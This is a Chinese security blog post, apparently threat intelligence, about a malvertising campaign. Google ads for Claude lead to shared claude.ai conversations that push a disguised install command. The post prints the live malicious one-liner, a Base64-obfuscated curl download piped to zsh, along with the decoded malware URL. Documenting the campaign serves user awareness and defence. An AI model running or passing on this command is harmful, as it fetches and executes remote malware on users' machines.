文章总结： 文档披露了一种通过Google竞价排名传播的Claude对话恶意投毒攻击手法。攻击者购买Claude相关关键词广告，伪装成官方链接诱导用户点击，实际重定向至恶意域名并执行Base64编码的恶意脚本（如garagedoorskentucky.com/curl/…）。该手法属于供应链攻击变种，利用用户对搜索引擎广告的信任实施投毒。建议用户谨慎点击竞价排名链接，优先通过官方渠道访问服务。 综合评分： 72 文章分类： 恶意软件,社会工程学,安全意识,威胁情报,漏洞分析

关于使用Google竞价排名分享Claude对话的恶意投毒

原创

安全赛博 安全赛博

安全赛博

2026年6月22日 16:52 日本

在小说阅读器读本章

去阅读

使用Google搜索Claude后，如下图所示

点击右键复制该链接

https://www.google.com/aclk?sa=L&ai=DChsSEwiFzZDkoZqVAxV0MYMDHW55GgAYACICCAEQABoCc2Y&co=1&gclid=EAIaIQobChMIhc2Q5KGalQMVdDGDAx1ueRoAEAAYASAAEgLzlfD_BwE&cid=CAASugHkaEleAL_qix3WNmf5KFhjWXY1CLZmw3Vyg_9Dag2cVhT3niwsiIfWa_feP7LDk8IIMPg4M9sS48NvLPqMsx3EKWJ9r5Jn7qZRrtvj2jhiD0ughe7KKLM4DPUEvuqNjwPZjudSbGtd6S11bbWaffBnAtGiDoh38pyfXnjiWUx-clFML-QjupXC4SgGhp1yZEXfgm4eiIWbvfima9uz6hedd7fU4BLMI-1KHFUfF1vNV3NH4ItNt0E_tLA&cce=1&sig=AOD64_17Kl08AmAPTs8rKSMlrwhue0ebuQ&q&adurl&ved=2ahUKEwjXrIjkoZqVAxUL3TgGHc7DOqoQ0Qx6BAgVEAE

直接点击该链接进入，看到的依旧是Claude官方域名

https://claude.ai/share/b36c465d-3254-4ff5-b67f-5bce24c4a431?utm_source=google

解开Base64的编码

curl -kfsSL $(echo ‘aHR0cDovL2dhcmFnZWRvb3Jza2VudHVja3kuY29tL2N1cmwvMzM4NDk3YmU4MWQ0OWE2NmU3ZmYwODMwZjBlMDc2ZDFiOTU1NTJkNmIzMTI0MWExNmRiZGVkMWViNmFlOGQ2ZQ==’|base64 -D)|zsh

将这个文件进行下载分析（下载地址为http://garagedoorskentucky.com/curl/338497be81d49a66e7ff0830f0e076d1b95552d6b31241a16dbded1eb6ae8d6e）

分析结果如下

关于分析不再过多赘述

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全赛博 安全赛博 安全赛博《关于使用Google竞价排名分享Claude对话的恶意投毒》